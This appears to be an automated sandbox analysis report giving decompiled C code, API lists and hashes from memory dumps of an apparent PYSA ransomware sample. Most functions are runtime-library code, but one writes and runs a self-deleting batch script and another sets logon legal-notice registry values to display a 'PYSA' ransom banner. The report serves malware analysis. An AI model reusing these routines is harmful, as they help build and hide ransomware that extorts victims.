                    0x01400d42
                    0x01400c80
                    0x01400c80
                    0x01400c83
                    0x01400c83
                    0x01400c87
                    0x00000000
                    0x00000000
                    0x01400c89
                    0x01400c8d
                    0x01400c9a
                    0x01400c92
                    0x01400c96
                    0x01400c96
                    0x01400c97
                    0x01400c97
                    0x01400c9e
                    0x01400ca1
                    0x01400ca4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01400ca4
                    0x00000000
                    0x01400c83
                    0x01400c79
                    0x01400bb0
                    0x01400b2d
                    0x01400b2e
                    0x01400b33
                    0x01400b37
                    0x01400b38
                    0x01400b39
                    0x01400b3e
                    0x01400b43
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: _free$Info
                    • String ID:
                    • API String ID: 2509303402-0
                    • Opcode ID: 582e29e075c6eaf7e32f19bb4f9d99f92d014eabe15b81efb1cea20054d8a064
                    • Instruction ID: 6995e4ffaceb47f4210e3d306818dd21e2f7fcd9415903334008a518cba965ca
                    • Opcode Fuzzy Hash: 582e29e075c6eaf7e32f19bb4f9d99f92d014eabe15b81efb1cea20054d8a064
                    • Instruction Fuzzy Hash: 56B172B19002069FDB12DFAAC880BEEBBF5BF18350F14407EF559B72A1D77598418B60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0140EAA1(intOrPtr _a4) {
                    				intOrPtr _v8;
                    				intOrPtr _t25;
                    				intOrPtr* _t26;
                    				intOrPtr _t28;
                    				intOrPtr* _t29;
                    				intOrPtr* _t31;
                    				intOrPtr* _t45;
                    				intOrPtr* _t46;
                    				intOrPtr* _t47;
                    				intOrPtr* _t55;
                    				intOrPtr* _t70;
                    				intOrPtr _t74;
                    
                    				_t74 = _a4;
                    				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                    				if(_t25 != 0 && _t25 != 0x1435348) {
                    					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                    					if(_t45 != 0 &&  *_t45 == 0) {
                    						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                    						if(_t46 != 0 &&  *_t46 == 0) {
                    							E014012E1(_t46);
                    							E0140DDFA( *((intOrPtr*)(_t74 + 0x88)));
                    						}
                    						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                    						if(_t47 != 0 &&  *_t47 == 0) {
                    							E014012E1(_t47);
                    							E0140E2B4( *((intOrPtr*)(_t74 + 0x88)));
                    						}
                    						E014012E1( *((intOrPtr*)(_t74 + 0x7c)));
                    						E014012E1( *((intOrPtr*)(_t74 + 0x88)));
                    					}
                    				}
                    				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                    				if(_t26 != 0 &&  *_t26 == 0) {
                    					E014012E1( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                    					E014012E1( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                    					E014012E1( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                    					E014012E1( *((intOrPtr*)(_t74 + 0x8c)));
                    				}
                    				E0140EC14( *((intOrPtr*)(_t74 + 0x9c)));
                    				_t28 = 6;
                    				_t55 = _t74 + 0xa0;
                    				_v8 = _t28;
                    				_t70 = _t74 + 0x28;
                    				do {
                    					if( *((intOrPtr*)(_t70 - 8)) != 0x14354a0) {
                    						_t31 =  *_t70;
                    						if(_t31 != 0 &&  *_t31 == 0) {
                    							E014012E1(_t31);
                    							E014012E1( *_t55);
                    						}
                    						_t28 = _v8;
                    					}
                    					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                    						_t29 =  *((intOrPtr*)(_t70 - 4));
                    						if(_t29 != 0 &&  *_t29 == 0) {
                    							E014012E1(_t29);
                    						}
                    						_t28 = _v8;
                    					}
                    					_t55 = _t55 + 4;
                    					_t70 = _t70 + 0x10;
                    					_t28 = _t28 - 1;
                    					_v8 = _t28;
                    				} while (_t28 != 0);
                    				return E014012E1(_t74);
                    			}

                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 0140EAE5
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DE17
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DE29
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DE3B
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DE4D
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DE5F
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DE71
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DE83
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DE95
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DEA7
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DEB9
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DECB
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DEDD
                      • Part of subcall function 0140DDFA: _free.LIBCMT ref: 0140DEEF
                    • _free.LIBCMT ref: 0140EADA
                      • Part of subcall function 014012E1: HeapFree.KERNEL32(00000000,00000000,?,0140E567,?,00000000,?,00000000,?,0140E80B,?,00000007,?,?,0140EC39,?), ref: 014012F7
                      • Part of subcall function 014012E1: GetLastError.KERNEL32(?,?,0140E567,?,00000000,?,00000000,?,0140E80B,?,00000007,?,?,0140EC39,?,?), ref: 01401309
                    • _free.LIBCMT ref: 0140EAFC
                    • _free.LIBCMT ref: 0140EB11
                    • _free.LIBCMT ref: 0140EB1C
                    • _free.LIBCMT ref: 0140EB3E
                    • _free.LIBCMT ref: 0140EB51
                    • _free.LIBCMT ref: 0140EB5F
                    • _free.LIBCMT ref: 0140EB6A
                    • _free.LIBCMT ref: 0140EBA2
                    • _free.LIBCMT ref: 0140EBA9
                    • _free.LIBCMT ref: 0140EBC6
                    • _free.LIBCMT ref: 0140EBDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID:
                    • API String ID: 161543041-0
                    • Opcode ID: 8b72beaebd93a7e848669106750bbd09eb73290c9205fc4271c4b67b9b28186e
                    • Instruction ID: c9840db402379ffffa2fcf2ae21198f956b259dd8bac1375d0c2ce6f2bc73802
                    • Opcode Fuzzy Hash: 8b72beaebd93a7e848669106750bbd09eb73290c9205fc4271c4b67b9b28186e
                    • Instruction Fuzzy Hash: 14314E715046069BEB22AB6BD884B5777E9EF10710F14483FE45AF62F1DA71E860CA24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E013C9E22() {
                    				signed int _v8;
                    				char _v268;
                    				char _v528;
                    				char _v788;
                    				long _v792;
                    				void* _v804;
                    				void* __ebp;
                    				signed int _t27;
                    				intOrPtr _t31;
                    				char _t34;
                    				char* _t36;
                    				intOrPtr _t40;
                    				intOrPtr _t41;
                    				intOrPtr _t42;
                    				void _t49;
                    				void* _t58;
                    				intOrPtr* _t63;
                    				void* _t66;
                    				intOrPtr* _t69;
                    				void* _t71;
                    				void* _t73;
                    				void* _t74;
                    				intOrPtr* _t77;
                    				void* _t79;
                    				signed int _t80;
                    				void* _t81;
                    
                    				_t27 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t27 ^ _t80;
                    				GetTempPathA(0x104,  &_v268);
                    				_t73 =  &_v268 - 1;
                    				do {
                    					_t31 =  *((intOrPtr*)(_t73 + 1));
                    					_t73 = _t73 + 1;
                    				} while (_t31 != 0);
                    				asm("movsd");
                    				asm("movsd");
                    				asm("movsw");
                    				asm("movsb");
                    				GetModuleFileNameA(0,  &_v528, 0x104);
                    				_t58 = 0;
                    				do {
                    					_t34 =  *((intOrPtr*)(_t80 + _t58 - 0x20c));
                    					 *((char*)(_t80 + _t58 - 0x310)) = _t34;
                    					_t58 = _t58 + 1;
                    				} while (_t34 != 0);
                    				_t36 = E013F59F0( &_v788, 0x5c);
                    				if(_t36 != 0) {
                    					 *_t36 = 0;
                    				}
                    				_t74 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                    				if(_t74 != 0xffffffff) {
                    					_t63 = ":Repeat\r\ndel \"%s\"\r\nif exist \"%s\" goto Repeat\r\nrmdir \"%s\"\r\ndel \"%s\"";
                    					do {
                    						_t40 =  *_t63;
                    						_t63 = _t63 + 1;
                    					} while (_t40 != 0);
                    					_t69 =  &_v528;
                    					do {
                    						_t41 =  *_t69;
                    						_t69 = _t69 + 1;
                    					} while (_t41 != 0);
                    					_t77 =  &_v268;
                    					do {
                    						_t42 =  *_t77;
                    						_t77 = _t77 + 1;
                    					} while (_t42 != 0);
                    					E013F2CE0();
                    					_t79 = _t81;
                    					wsprintfA(_t79, ":Repeat\r\ndel \"%s\"\r\nif exist \"%s\" goto Repeat\r\nrmdir \"%s\"\r\ndel \"%s\"",  &_v528,  &_v528,  &_v788,  &_v268);
                    					_t66 = _t79;
                    					_t71 = _t66 + 1;
                    					do {
                    						_t49 =  *_t66;
                    						_t66 = _t66 + 1;
                    					} while (_t49 != 0);
                    					WriteFile(_t74, _t79, _t66 - _t71,  &_v792, 0);
                    					CloseHandle(_t74);
                    					_t38 = ShellExecuteA(0, "open",  &_v268, 0, 0, 0);
                    				}
                    				return E013F268B(_t38, _v8 ^ _t80);
                    			}

                    APIs
                    • GetTempPathA.KERNEL32(00000104,?), ref: 013C9E45
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 013C9E6F
                    • _strrchr.LIBCMT ref: 013C9E93
                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 013C9EB6
                    • wsprintfA.USER32(?,:Repeat\r\ndel "%s"\r\nif exist "%s" goto Repeat\r\nrmdir "%s"\r\ndel "%s",?,?,?,?), ref: 013C9F27
                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 013C9F4B
                    • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 013C9F52
                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000,?,?,?,00000000), ref: 013C9F68
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateExecuteHandleModuleNamePathShellTempWrite_strrchrwsprintf
                    • String ID: :Repeat\r\ndel "%s"\r\nif exist "%s" goto Repeat\r\nrmdir "%s"\r\ndel "%s"$open$update.bat
                    • API String ID: 2071346621-1550444414
                    • Opcode ID: 797d98fea79eb8a2213242201dd8dbf912a669a5e8db5c339db4aa1bc870b96c
                    • Instruction ID: 1ca53a4c830307f9ab3f3c760dc2e43ffb92b8a0c9a12c645ac3892076896afa
                    • Opcode Fuzzy Hash: 797d98fea79eb8a2213242201dd8dbf912a669a5e8db5c339db4aa1bc870b96c
                    • Instruction Fuzzy Hash: C741FBB55001499FDF25CF68DC84EFA7B6CEF45748F1002D9E98997102D6715E4A8F70
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E0140DEF8(void* __edx, char _a4) {
                    				void* _v8;
                    				void* _v12;
                    				signed int _v16;
                    				intOrPtr* _v20;
                    				signed int _v24;
                    				char _v28;
                    				signed int _t105;
                    				signed int _t115;
                    				signed int _t117;
                    				signed int _t121;
                    				signed int _t125;
                    				signed int _t129;
                    				signed int _t133;
                    				signed int _t137;
                    				signed int _t141;
                    				signed int _t145;
                    				signed int _t149;
                    				signed int _t153;
                    				signed int _t157;
                    				signed int _t161;
                    				signed int _t165;
                    				signed int _t169;
                    				signed int _t173;
                    				signed int _t177;
                    				signed int _t181;
                    				signed int _t185;
                    				signed int _t189;
                    				char _t195;
                    				char _t210;
                    				signed int _t213;
                    				void* _t224;
                    				char* _t226;
                    				signed int _t227;
                    				signed int _t231;
                    				signed int _t232;
                    				intOrPtr _t233;
                    				void* _t234;
                    				void* _t236;
                    				char* _t257;
                    
                    				_t224 = __edx;
                    				_t210 = _a4;
                    				_v16 = 0;
                    				_v28 = _t210;
                    				_v24 = 0;
                    				if( *((intOrPtr*)(_t210 + 0xac)) != 0 ||  *((intOrPtr*)(_t210 + 0xb0)) != 0) {
                    					_t234 = E014009B2(0, 1, 0x50);
                    					_v8 = _t234;
                    					E014012E1(0);
                    					if(_t234 != 0) {
                    						_t227 = E014009B2(0, 1, 4);
                    						_v12 = _t227;
                    						E014012E1(0);
                    						if(_t227 != 0) {
                    							if( *((intOrPtr*)(_t210 + 0xac)) == 0) {
                    								_t213 = 0x14;
                    								memcpy(_v8, 0x1435348, _t213 << 2);
                    								L25:
                    								_t236 = _v8;
                    								_t231 = _v16;
                    								 *_t236 =  *( *(_t210 + 0x88));
                    								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t210 + 0x88) + 4));
                    								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t210 + 0x88) + 8));
                    								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x30));
                    								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t210 + 0x88) + 0x34));
                    								 *_v12 = 1;
                    								if(_t231 != 0) {
                    									 *_t231 = 1;
                    								}
                    								goto L27;
                    							}
                    							_t232 = E014009B2(0, 1, 4);
                    							_v16 = _t232;
                    							E014012E1(0);
                    							if(_t232 != 0) {
                    								_t233 =  *((intOrPtr*)(_t210 + 0xac));
                    								_t14 = _t234 + 0xc; // 0xc
                    								_t115 = E01409B26(_t224);
                    								_t117 = E01409B26(_t224,  &_v28, 1, _t233, 0x14, _v8 + 0x10,  &_v28);
                    								_t121 = E01409B26(_t224,  &_v28, 1, _t233, 0x16, _v8 + 0x14, 1);
                    								_t125 = E01409B26(_t224,  &_v28, 1, _t233, 0x17, _v8 + 0x18, _t233);
                    								_v20 = _v8 + 0x1c;
                    								_t129 = E01409B26(_t224,  &_v28, 1, _t233, 0x18, _v8 + 0x1c, 0x15);
                    								_t133 = E01409B26(_t224,  &_v28, 1, _t233, 0x50, _v8 + 0x20, _t14);
                    								_t137 = E01409B26(_t224);
                    								_t141 = E01409B26(_t224,  &_v28, 0, _t233, 0x1a, _v8 + 0x28,  &_v28);
                    								_t145 = E01409B26(_t224,  &_v28, 0, _t233, 0x19, _v8 + 0x29, 1);
                    								_t149 = E01409B26(_t224,  &_v28, 0, _t233, 0x54, _v8 + 0x2a, _t233);
                    								_t153 = E01409B26(_t224,  &_v28, 0, _t233, 0x55, _v8 + 0x2b, 0x51);
                    								_t157 = E01409B26(_t224,  &_v28, 0, _t233, 0x56, _v8 + 0x2c, _v8 + 0x24);
                    								_t161 = E01409B26(_t224);
                    								_t165 = E01409B26(_t224,  &_v28, 0, _t233, 0x52, _v8 + 0x2e,  &_v28);
                    								_t169 = E01409B26(_t224,  &_v28, 0, _t233, 0x53, _v8 + 0x2f, 0);
                    								_t173 = E01409B26(_t224,  &_v28, 2, _t233, 0x15, _v8 + 0x38, _t233);
                    								_t177 = E01409B26(_t224,  &_v28, 2, _t233, 0x14, _v8 + 0x3c, 0x57);
                    								_t181 = E01409B26(_t224,  &_v28, 2, _t233, 0x16, _v8 + 0x40, _v8 + 0x2d);
                    								_push(_v8 + 0x44);
                    								_push(0x17);
                    								_push(_t233);
                    								_t185 = E01409B26(_t224);
                    								_t189 = E01409B26(_t224,  &_v28, 2, _t233, 0x50, _v8 + 0x48,  &_v28);
                    								if((E01409B26(_t224,  &_v28, 2, _t233, 0x51, _v8 + 0x4c, 2) | _t115 | _t117 | _t121 | _t125 | _t129 | _t133 | _t137 | _t141 | _t145 | _t149 | _t153 | _t157 | _t161 | _t165 | _t169 | _t173 | _t177 | _t181 | _t185 | _t189) == 0) {
                    									_t226 =  *_v20;
                    									while( *_t226 != 0) {
                    										_t195 =  *_t226;
                    										if(_t195 < 0x30 || _t195 > 0x39) {
                    											if(_t195 != 0x3b) {
                    												goto L17;
                    											}
                    											_t257 = _t226;
                    											do {
                    												 *_t257 =  *((intOrPtr*)(_t257 + 1));
                    												_t257 = _t257 + 1;
                    											} while ( *_t257 != 0);
                    										} else {
                    											 *_t226 = _t195 - 0x30;
                    											L17:
                    											_t226 = _t226 + 1;
                    										}
                    									}
                    									goto L25;
                    								}
                    								E0140DDFA(_v8);
                    								E014012E1(_v8);
                    								E014012E1(_v12);
                    								E014012E1(_v16);
                    								goto L4;
                    							}
                    							E014012E1(_t234);
                    							E014012E1(_v12);
                    							L7:
                    							goto L4;
                    						}
                    						E014012E1(_t234);
                    						goto L7;
                    					}
                    					L4:
                    					return 1;
                    				} else {
                    					_t231 = 0;
                    					_v12 = 0;
                    					_t236 = 0x1435348;
                    					L27:
                    					_t105 =  *(_t210 + 0x84);
                    					if(_t105 != 0) {
                    						asm("lock dec dword [eax]");
                    					}
                    					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
                    						asm("lock xadd [ecx], eax");
                    						if((_t105 | 0xffffffff) == 0) {
                    							E014012E1( *(_t210 + 0x88));
                    							E014012E1( *((intOrPtr*)(_t210 + 0x7c)));
                    						}
                    					}
                    					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
                    					 *(_t210 + 0x84) = _t231;
                    					 *(_t210 + 0x88) = _t236;
                    					return 0;
                    				}
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 28ab8c2204e0d6177ce6c549f2b2ca986ca8eccc07102bf54b9a640c77dfca98
                    • Instruction ID: 5b0109ed59cc6c2f4e251fedd115a50cf039017903b181f6baddc76cc7189ee8
                    • Opcode Fuzzy Hash: 28ab8c2204e0d6177ce6c549f2b2ca986ca8eccc07102bf54b9a640c77dfca98
                    • Instruction Fuzzy Hash: 18C144B2E40205AFDB21DBAACC81FEA77F8EB18714F14457AFA04FB2D2D67099418754
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0140690D(char _a4) {
                    				char _v8;
                    
                    				_t26 = _a4;
                    				_t52 =  *_a4;
                    				if( *_a4 != 0x1423850) {
                    					E014012E1(_t52);
                    					_t26 = _a4;
                    				}
                    				E014012E1( *((intOrPtr*)(_t26 + 0x3c)));
                    				E014012E1( *((intOrPtr*)(_a4 + 0x30)));
                    				E014012E1( *((intOrPtr*)(_a4 + 0x34)));
                    				E014012E1( *((intOrPtr*)(_a4 + 0x38)));
                    				E014012E1( *((intOrPtr*)(_a4 + 0x28)));
                    				E014012E1( *((intOrPtr*)(_a4 + 0x2c)));
                    				E014012E1( *((intOrPtr*)(_a4 + 0x40)));
                    				E014012E1( *((intOrPtr*)(_a4 + 0x44)));
                    				E014012E1( *((intOrPtr*)(_a4 + 0x360)));
                    				_v8 =  &_a4;
                    				E014067D3(5,  &_v8);
                    				_v8 =  &_a4;
                    				return E01406823(4,  &_v8);
                    			}

                    APIs
                    • _free.LIBCMT ref: 01406921
                      • Part of subcall function 014012E1: HeapFree.KERNEL32(00000000,00000000,?,0140E567,?,00000000,?,00000000,?,0140E80B,?,00000007,?,?,0140EC39,?), ref: 014012F7
                      • Part of subcall function 014012E1: GetLastError.KERNEL32(?,?,0140E567,?,00000000,?,00000000,?,0140E80B,?,00000007,?,?,0140EC39,?,?), ref: 01401309
                    • _free.LIBCMT ref: 0140692D
                    • _free.LIBCMT ref: 01406938
                    • _free.LIBCMT ref: 01406943
                    • _free.LIBCMT ref: 0140694E
                    • _free.LIBCMT ref: 01406959
                    • _free.LIBCMT ref: 01406964
                    • _free.LIBCMT ref: 0140696F
                    • _free.LIBCMT ref: 0140697A
                    • _free.LIBCMT ref: 01406988
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 825f01080481eb1f52bba20c830756b0d5e7daa29b111302e213fb38f875e3bd
                    • Instruction ID: c441a66a86bf5389768a1edfaac626696579c9831cff1eed6ef2d5ea47681803
                    • Opcode Fuzzy Hash: 825f01080481eb1f52bba20c830756b0d5e7daa29b111302e213fb38f875e3bd
                    • Instruction Fuzzy Hash: C51177B6500109BFCB02EFD6C981CD93BA5EF34750B5140BAFA09AF6B1D631DA60DB84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E013C238E(void* __edx, void* __eflags) {
                    				intOrPtr* _t19;
                    				intOrPtr _t30;
                    				void* _t39;
                    				intOrPtr* _t40;
                    				void* _t42;
                    
                    				_t39 = __edx;
                    				_push(0x18);
                    				E013F26F6(E0141546E);
                    				_t30 =  *((intOrPtr*)(_t42 + 8));
                    				E013F0E3A(_t42 - 0x14, 0);
                    				_t40 =  *0x143881c; // 0xaf5b40
                    				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
                    				 *((intOrPtr*)(_t42 - 0x18)) = _t40;
                    				_t19 = E013C5C4E(_t30, E013C3FBC(0x1439c98));
                    				_t41 = _t19;
                    				if(_t19 == 0) {
                    					if(_t40 == 0) {
                    						_push(_t30);
                    						_push(_t42 - 0x18);
                    						__eflags = E013C5BE8(_t39) - 0xffffffff;
                    						if(__eflags == 0) {
                    							_t7 = _t42 - 0x1c;
                    							 *_t7 =  *(_t42 - 0x1c) & 0x00000000;
                    							__eflags =  *_t7;
                    							 *(_t42 - 0x20) = "bad cast";
                    							 *((intOrPtr*)(_t42 - 0x24)) = 0x141a83c;
                    							E013F4EC6(_t42 - 0x24, 0x1430c50);
                    						}
                    						_t41 =  *((intOrPtr*)(_t42 - 0x18));
                    						 *0x143881c = _t41;
                    						 *((intOrPtr*)( *_t41 + 4))();
                    						E013F13BA(__eflags, _t41);
                    					} else {
                    						_t41 = _t40;
                    					}
                    				}
                    				E013F0E92(_t42 - 0x14);
                    				return E013F26B1(_t41);
                    			}

                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 013C2395
                    • std::_Lockit::_Lockit.LIBCPMT ref: 013C23A2
                      • Part of subcall function 013C3FBC: std::_Lockit::_Lockit.LIBCPMT ref: 013C3FD8
                      • Part of subcall function 013C3FBC: std::_Lockit::~_Lockit.LIBCPMT ref: 013C3FF4
                    • std::locale::_Getfacet.LIBCPMT ref: 013C23C1
                    • ctype.LIBCPMT ref: 013C23D9
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C2400
                    • std::_Facet_Register.LIBCPMT ref: 013C2416
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013C241F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prolog3_RegisterThrowctypestd::locale::_
                    • String ID: bad cast
                    • API String ID: 1257653062-3145022300
                    • Opcode ID: 3eae53f6954cff8a7562197b72c72ad618201618d34d5a438f095d662bde5c09
                    • Instruction ID: 3fd011ca3961aeaeb35840a421bdfd44316e8ebabed0e0dd2528246e5d74d5ab
                    • Opcode Fuzzy Hash: 3eae53f6954cff8a7562197b72c72ad618201618d34d5a438f095d662bde5c09
                    • Instruction Fuzzy Hash: 5E11C47190020A8BCF19EFACC440BEFB7B8BF54729F20411DE600BB291DB749D058B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E013C22F0(void* __edx, void* __eflags) {
                    				intOrPtr* _t19;
                    				intOrPtr _t30;
                    				void* _t39;
                    				intOrPtr* _t40;
                    				void* _t42;
                    
                    				_t39 = __edx;
                    				_push(0x18);
                    				E013F26F6(E0141546E);
                    				_t30 =  *((intOrPtr*)(_t42 + 8));
                    				E013F0E3A(_t42 - 0x14, 0);
                    				_t40 =  *0x1438834; // 0xb01828
                    				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
                    				 *((intOrPtr*)(_t42 - 0x18)) = _t40;
                    				_t19 = E013C5C4E(_t30, E013C3FBC(0x1438810));
                    				_t41 = _t19;
                    				if(_t19 == 0) {
                    					if(_t40 == 0) {
                    						_push(_t30);
                    						_push(_t42 - 0x18);
                    						__eflags = E013C5B80(_t39) - 0xffffffff;
                    						if(__eflags == 0) {
                    							_t7 = _t42 - 0x1c;
                    							 *_t7 =  *(_t42 - 0x1c) & 0x00000000;
                    							__eflags =  *_t7;
                    							 *(_t42 - 0x20) = "bad cast";
                    							 *((intOrPtr*)(_t42 - 0x24)) = 0x141a83c;
                    							E013F4EC6(_t42 - 0x24, 0x1430c50);
                    						}
                    						_t41 =  *((intOrPtr*)(_t42 - 0x18));
                    						 *0x1438834 = _t41;
                    						 *((intOrPtr*)( *_t41 + 4))();
                    						E013F13BA(__eflags, _t41);
                    					} else {
                    						_t41 = _t40;
                    					}
                    				}
                    				E013F0E92(_t42 - 0x14);
                    				return E013F26B1(_t41);
                    			}

                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 013C22F7
                    • std::_Lockit::_Lockit.LIBCPMT ref: 013C2304
                      • Part of subcall function 013C3FBC: std::_Lockit::_Lockit.LIBCPMT ref: 013C3FD8
                      • Part of subcall function 013C3FBC: std::_Lockit::~_Lockit.LIBCPMT ref: 013C3FF4
                    • std::locale::_Getfacet.LIBCPMT ref: 013C2323
                    • codecvt.LIBCPMT ref: 013C233B
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C2362
                    • std::_Facet_Register.LIBCPMT ref: 013C2378
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013C2381
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prolog3_RegisterThrowcodecvtstd::locale::_
                    • String ID: bad cast
                    • API String ID: 2753095091-3145022300
                    • Opcode ID: 4ceb3d933cb281cfe60a6d997499e15661f8fb71e3d9d3073a21860f1bb27132
                    • Instruction ID: 01f58ad821b368336f8abd5aac04bc355ab0dec3516ba811cd0a6236eb14b8e8
                    • Opcode Fuzzy Hash: 4ceb3d933cb281cfe60a6d997499e15661f8fb71e3d9d3073a21860f1bb27132
                    • Instruction Fuzzy Hash: 3511A57190050A9BCB15EFA8C540AAF77B4BF64A28F20410DE60077291DB70DE058B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 84%
                    			E013CA06D(void* __ecx) {
                    				signed int _v8;
                    				void* _v12;
                    				void* __ebp;
                    				signed int _t9;
                    				char _t13;
                    				char* _t20;
                    				char* _t24;
                    				char* _t26;
                    				signed int _t29;
                    
                    				_push(__ecx);
                    				_push(__ecx);
                    				_t9 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t9 ^ _t29;
                    				RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, 2,  &_v12);
                    				_t24 =  *0x14350bc; // 0x141bc40
                    				_t20 = _t24;
                    				_t3 =  &(_t20[1]); // 0x141bc41
                    				_t26 = _t3;
                    				do {
                    					_t13 =  *_t20;
                    					_t20 =  &(_t20[1]);
                    				} while (_t13 != 0);
                    				_t4 = _t20 - _t26 + 1; // 0x141bc42
                    				RegSetValueExA(_v12, "legalnoticetext", 0, 7, _t24, _t4);
                    				RegSetValueExA(_v12, "legalnoticecaption", 0, 7, "PYSA", 5);
                    				return E013F268B(RegCloseKey(_v12), _v8 ^ _t29);
                    			}

                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,00000002,?), ref: 013CA08F
                    • RegSetValueExA.ADVAPI32(?,legalnoticetext,00000000,00000007,0141BC40,0141BC42), ref: 013CA0C0
                    • RegSetValueExA.ADVAPI32(?,legalnoticecaption,00000000,00000007,PYSA,00000005), ref: 013CA0D5
                    • RegCloseKey.ADVAPI32(?), ref: 013CA0DA
                    Strings
                    • legalnoticecaption, xrefs: 013CA0CD
